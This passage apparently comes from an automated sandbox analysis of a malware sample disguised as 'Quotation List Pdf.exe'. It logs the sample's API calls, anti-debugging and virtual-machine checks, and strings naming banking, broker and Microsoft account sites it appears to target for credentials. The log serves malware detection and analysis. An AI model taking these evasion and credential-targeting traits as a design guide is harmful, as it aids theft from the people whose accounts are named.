            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0309BE10 FindFirstFileW,FindNextFileW,FindClose,7_2_0309BE10
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768442B90 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF768442B90
            Source: y870G2JOQ.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: discord.comVMware20,11696494690f
            Source: y870G2JOQ.7.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: y870G2JOQ.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: y870G2JOQ.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: y870G2JOQ.7.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: Quotation List Pdf.exeBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: y870G2JOQ.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: y870G2JOQ.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: firefox.exe, 0000000B.00000002.1847485362.0000016FA2CBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW)
            Source: y870G2JOQ.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3299312256.0000000000EBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
            Source: y870G2JOQ.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
            Source: y870G2JOQ.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: y870G2JOQ.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: y870G2JOQ.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: y870G2JOQ.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: y870G2JOQ.7.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: y870G2JOQ.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: y870G2JOQ.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: y870G2JOQ.7.drBinary or memory string: global block list test formVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: y870G2JOQ.7.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: y870G2JOQ.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: y870G2JOQ.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: y870G2JOQ.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: y870G2JOQ.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: y870G2JOQ.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583BD30 rdtscp 5_2_0583BD30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00417703 LdrLoadDll,5_2_00417703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05812582 mov eax, dword ptr fs:[00000030h]5_2_05812582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05812582 mov ecx, dword ptr fs:[00000030h]5_2_05812582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05844588 mov eax, dword ptr fs:[00000030h]5_2_05844588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580758F mov eax, dword ptr fs:[00000030h]5_2_0580758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580758F mov eax, dword ptr fs:[00000030h]5_2_0580758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580758F mov eax, dword ptr fs:[00000030h]5_2_0580758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E59C mov eax, dword ptr fs:[00000030h]5_2_0584E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589B594 mov eax, dword ptr fs:[00000030h]5_2_0589B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589B594 mov eax, dword ptr fs:[00000030h]5_2_0589B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h]5_2_058315A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h]5_2_058315A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h]5_2_058315A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h]5_2_058315A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315A9 mov eax, dword ptr fs:[00000030h]5_2_058315A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058905A7 mov eax, dword ptr fs:[00000030h]5_2_058905A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058905A7 mov eax, dword ptr fs:[00000030h]5_2_058905A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058905A7 mov eax, dword ptr fs:[00000030h]5_2_058905A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A35BA mov eax, dword ptr fs:[00000030h]5_2_058A35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A35BA mov eax, dword ptr fs:[00000030h]5_2_058A35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A35BA mov eax, dword ptr fs:[00000030h]5_2_058A35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A35BA mov eax, dword ptr fs:[00000030h]5_2_058A35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF5BE mov eax, dword ptr fs:[00000030h]5_2_058CF5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058345B1 mov eax, dword ptr fs:[00000030h]5_2_058345B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058345B1 mov eax, dword ptr fs:[00000030h]5_2_058345B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583F5B0 mov eax, dword ptr fs:[00000030h]5_2_0583F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058455C0 mov eax, dword ptr fs:[00000030h]5_2_058455C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E55C9 mov eax, dword ptr fs:[00000030h]5_2_058E55C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E5CF mov eax, dword ptr fs:[00000030h]5_2_0584E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E5CF mov eax, dword ptr fs:[00000030h]5_2_0584E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058165D0 mov eax, dword ptr fs:[00000030h]5_2_058165D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A5D0 mov eax, dword ptr fs:[00000030h]5_2_0584A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A5D0 mov eax, dword ptr fs:[00000030h]5_2_0584A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E35D7 mov eax, dword ptr fs:[00000030h]5_2_058E35D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E35D7 mov eax, dword ptr fs:[00000030h]5_2_058E35D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E35D7 mov eax, dword ptr fs:[00000030h]5_2_058E35D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058395DA mov eax, dword ptr fs:[00000030h]5_2_058395DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058125E0 mov eax, dword ptr fs:[00000030h]5_2_058125E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h]5_2_0583E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h]5_2_0583E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h]5_2_0583E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h]5_2_0583E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h]5_2_0583E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h]5_2_0583E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h]5_2_0583E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E5E7 mov eax, dword ptr fs:[00000030h]5_2_0583E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C5ED mov eax, dword ptr fs:[00000030h]5_2_0584C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584C5ED mov eax, dword ptr fs:[00000030h]5_2_0584C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h]5_2_058315F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h]5_2_058315F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h]5_2_058315F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h]5_2_058315F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h]5_2_058315F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058315F4 mov eax, dword ptr fs:[00000030h]5_2_058315F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05847505 mov eax, dword ptr fs:[00000030h]5_2_05847505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05847505 mov ecx, dword ptr fs:[00000030h]5_2_05847505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h]5_2_058E4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h]5_2_058E4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h]5_2_058E4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h]5_2_058E4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h]5_2_058E4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h]5_2_058E4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E4500 mov eax, dword ptr fs:[00000030h]5_2_058E4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CB52F mov eax, dword ptr fs:[00000030h]5_2_058CB52F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h]5_2_058BF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h]5_2_058BF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h]5_2_058BF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h]5_2_058BF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h]5_2_058BF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h]5_2_058BF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BF525 mov eax, dword ptr fs:[00000030h]5_2_058BF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584D530 mov eax, dword ptr fs:[00000030h]5_2_0584D530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584D530 mov eax, dword ptr fs:[00000030h]5_2_0584D530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h]5_2_0581D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h]5_2_0581D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h]5_2_0581D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h]5_2_0581D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h]5_2_0581D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581D534 mov eax, dword ptr fs:[00000030h]5_2_0581D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820535 mov eax, dword ptr fs:[00000030h]5_2_05820535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820535 mov eax, dword ptr fs:[00000030h]5_2_05820535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820535 mov eax, dword ptr fs:[00000030h]5_2_05820535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820535 mov eax, dword ptr fs:[00000030h]5_2_05820535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820535 mov eax, dword ptr fs:[00000030h]5_2_05820535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820535 mov eax, dword ptr fs:[00000030h]5_2_05820535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E5537 mov eax, dword ptr fs:[00000030h]5_2_058E5537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h]5_2_0583E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h]5_2_0583E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h]5_2_0583E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h]5_2_0583E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583E53E mov eax, dword ptr fs:[00000030h]5_2_0583E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05818550 mov eax, dword ptr fs:[00000030h]5_2_05818550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05818550 mov eax, dword ptr fs:[00000030h]5_2_05818550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B562 mov eax, dword ptr fs:[00000030h]5_2_0580B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584656A mov eax, dword ptr fs:[00000030h]5_2_0584656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584656A mov eax, dword ptr fs:[00000030h]5_2_0584656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584656A mov eax, dword ptr fs:[00000030h]5_2_0584656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584B570 mov eax, dword ptr fs:[00000030h]5_2_0584B570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584B570 mov eax, dword ptr fs:[00000030h]5_2_0584B570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B480 mov eax, dword ptr fs:[00000030h]5_2_0580B480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05819486 mov eax, dword ptr fs:[00000030h]5_2_05819486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05819486 mov eax, dword ptr fs:[00000030h]5_2_05819486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058164AB mov eax, dword ptr fs:[00000030h]5_2_058164AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058434B0 mov eax, dword ptr fs:[00000030h]5_2_058434B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058444B0 mov ecx, dword ptr fs:[00000030h]5_2_058444B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0589A4B0 mov eax, dword ptr fs:[00000030h]5_2_0589A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E54DB mov eax, dword ptr fs:[00000030h]5_2_058E54DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058104E5 mov ecx, dword ptr fs:[00000030h]5_2_058104E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058B94E0 mov eax, dword ptr fs:[00000030h]5_2_058B94E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05848402 mov eax, dword ptr fs:[00000030h]5_2_05848402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05848402 mov eax, dword ptr fs:[00000030h]5_2_05848402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05848402 mov eax, dword ptr fs:[00000030h]5_2_05848402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583340D mov eax, dword ptr fs:[00000030h]5_2_0583340D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580E420 mov eax, dword ptr fs:[00000030h]5_2_0580E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580E420 mov eax, dword ptr fs:[00000030h]5_2_0580E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580E420 mov eax, dword ptr fs:[00000030h]5_2_0580E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580C427 mov eax, dword ptr fs:[00000030h]5_2_0580C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584A430 mov eax, dword ptr fs:[00000030h]5_2_0584A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h]5_2_0581B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h]5_2_0581B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h]5_2_0581B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h]5_2_0581B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h]5_2_0581B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581B440 mov eax, dword ptr fs:[00000030h]5_2_0581B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h]5_2_0584E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h]5_2_0584E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h]5_2_0584E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h]5_2_0584E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h]5_2_0584E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h]5_2_0584E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h]5_2_0584E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E443 mov eax, dword ptr fs:[00000030h]5_2_0584E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583245A mov eax, dword ptr fs:[00000030h]5_2_0583245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580645D mov eax, dword ptr fs:[00000030h]5_2_0580645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF453 mov eax, dword ptr fs:[00000030h]5_2_058CF453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811460 mov eax, dword ptr fs:[00000030h]5_2_05811460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811460 mov eax, dword ptr fs:[00000030h]5_2_05811460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811460 mov eax, dword ptr fs:[00000030h]5_2_05811460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811460 mov eax, dword ptr fs:[00000030h]5_2_05811460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811460 mov eax, dword ptr fs:[00000030h]5_2_05811460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h]5_2_0582F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h]5_2_0582F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h]5_2_0582F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h]5_2_0582F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h]5_2_0582F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582F460 mov eax, dword ptr fs:[00000030h]5_2_0582F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E547F mov eax, dword ptr fs:[00000030h]5_2_058E547F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583A470 mov eax, dword ptr fs:[00000030h]5_2_0583A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583A470 mov eax, dword ptr fs:[00000030h]5_2_0583A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583A470 mov eax, dword ptr fs:[00000030h]5_2_0583A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF78A mov eax, dword ptr fs:[00000030h]5_2_058CF78A
